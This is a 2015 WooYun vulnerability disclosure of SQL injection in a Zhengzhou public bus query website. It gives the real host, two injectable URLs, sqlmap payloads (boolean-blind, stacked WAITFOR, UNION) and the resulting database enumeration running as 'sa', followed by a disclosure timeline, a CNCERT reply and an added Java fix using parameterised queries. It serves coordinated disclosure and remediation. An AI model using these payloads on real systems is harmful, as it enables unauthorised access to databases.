
Vulnerability summary

Defect ID: wooyun-2015-0130284

Title: Multiple SQL injection vulnerabilities in a provincial capital's public bus website (SA privileges)

Affected vendor: CNCERT (National Internet Emergency Center)

Author: 路人甲

Submitted: 2015-07-30 18:03

Fixed: 2015-09-17 11:58

Published: 2015-09-17 11:58

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-07-30: Details sent to the vendor, awaiting vendor handling
2015-08-03: Vendor confirmed; details visible to the vendor only
2015-08-13: Details disclosed to core white hats and domain experts
2015-08-23: Details disclosed to regular white hats
2015-09-02: Details disclosed to intern white hats
2015-09-17: Details disclosed to the public

Brief description:

SQL injection

Detailed description:

Zhengzhou bus information query system
http://218.28.136.20:8000/bus/

选区_068.png


选区_067.png


http://218.28.136.20:8000/bus/result.jsp?Area=%D6%A3%D6%DD&Name=12&Type=3&page=1


custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[17:47:20] [INFO] resuming back-end DBMS 'microsoft sql server'
[17:47:20] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://218.28.136.20:8000/bus/result.jsp?Area=%D6%A3%D6%DD&Name=12%' AND 8592=8592 AND '%'='&Type=3&page=1
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: http://218.28.136.20:8000/bus/result.jsp?Area=%D6%A3%D6%DD&Name=12%';WAITFOR DELAY '0:0:5'--&Type=3&page=1
---


web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000


available databases [5]:
[*] [NoA\x05]
[*] gongjiao
[*] master
[*] model
[*] msdb


Current database: gongjiao

current database:    'gongjiao'
current user: 'sa'


Database: gongjiao
[9 tables]
+----------------+
| BUS_ROUTE |
| BUS_SEGMENT |
| BUS_STATION |
| GTMAP_DW |
| dtproperties |
| mybbslist |
| strees |
| sysconstraints |
| syssegments |
+----------------+


选区_069.png


Proof of vulnerability:

Second injection point

选区_070.png


http://218.28.136.20:8000/bus/showunitdetailxl.jsp?id=126%C2%B7


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=126%C2%B7' AND 1255=1255 AND 'xfuz'='xfuz
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=126%C2%B7';WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: id=-7861' UNION ALL SELECT 69,69,69,69,69,69,69,69,69,CHAR(113)+CHAR(112)+CHAR(118)+CHAR(98)+CHAR(113)+CHAR(105)+CHAR(97)+CHAR(107)+CHAR(108)+CHAR(116)+CHAR(114)+CHAR(104)+CHAR(69)+CHAR(106)+CHAR(77)+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113),69--
---


available databases [7]:                                                       
[*] gongjiao
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb


Database: gongjiao                                                             
[10 tables]
+----------------+
| BUS_ROUTE |
| BUS_SEGMENT |
| BUS_STATION |
| GTMAP_DW |
| dtproperties |
| mybbslist |
| sqlmapoutput |
| strees |
| sysconstraints |
| syssegments |
+----------------+


Fix recommendation:

Copyright notice: when reposting, credit the source 路人甲@乌云 (WooYun)
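The report leaves the fix section empty. As an added illustration (not code from the report or from the affected site), the concatenation pattern implied by the `Name` payload, which closes a `LIKE '%...%'` literal, is shown beside a `PreparedStatement` version; the `id` parameter, which the payload shows is quoted as a string, is bound the same way. The query shape and all column names are assumptions; only the tables BUS_ROUTE and BUS_STATION are named on the page.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

// Hypothetical repair of the lookups behind result.jsp and showunitdetailxl.jsp.
// Column names (AREA, ROUTE_NAME, ID) are assumptions; they are not on the page.
public class BusRouteDao {

    // Reconstructed vulnerable shape, consistent with the recorded payload
    // `12%' AND 8592=8592 AND '%'='`: user input is spliced into a LIKE literal.
    static String vulnerableSql(String area, String name) {
        return "SELECT * FROM BUS_ROUTE WHERE AREA = '" + area
             + "' AND ROUTE_NAME LIKE '%" + name + "%'";
    }

    // Binding alone stops injection; escaping LIKE metacharacters additionally
    // stops user input from widening the match via '%' or '_'.
    static String escapeLike(String s) {
        return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_");
    }

    public static ResultSet findRoutes(Connection conn, String area, String name)
            throws SQLException {
        String sql = "SELECT * FROM BUS_ROUTE WHERE AREA = ? "
                   + "AND ROUTE_NAME LIKE ? ESCAPE '\\'";
        PreparedStatement ps = conn.prepareStatement(sql);
        ps.setString(1, area);
        ps.setString(2, "%" + escapeLike(name) + "%");
        return ps.executeQuery();
    }

    // The id payload (`126%C2%B7' AND 1255=1255 ...`) shows id is used as a
    // string literal, so it is bound as a string rather than concatenated.
    public static ResultSet findUnit(Connection conn, String id) throws SQLException {
        PreparedStatement ps = conn.prepareStatement(
            "SELECT * FROM BUS_STATION WHERE ID = ?");
        ps.setString(1, id);
        return ps.executeQuery();
    }
}
```

The `current user: 'sa'` line in the sqlmap output is the second defect: the connection in `conn` should come from a login with only SELECT on the gongjiao tables, so that even a missed injection point cannot reach stacked queries running as the server administrator.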


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-08-03 11:56

Vendor reply:

CNVD has confirmed and reproduced the reported vulnerability; CNCERT has forwarded it to the Henan branch center, which will coordinate handling with the organization operating the website.

Latest status:

None yet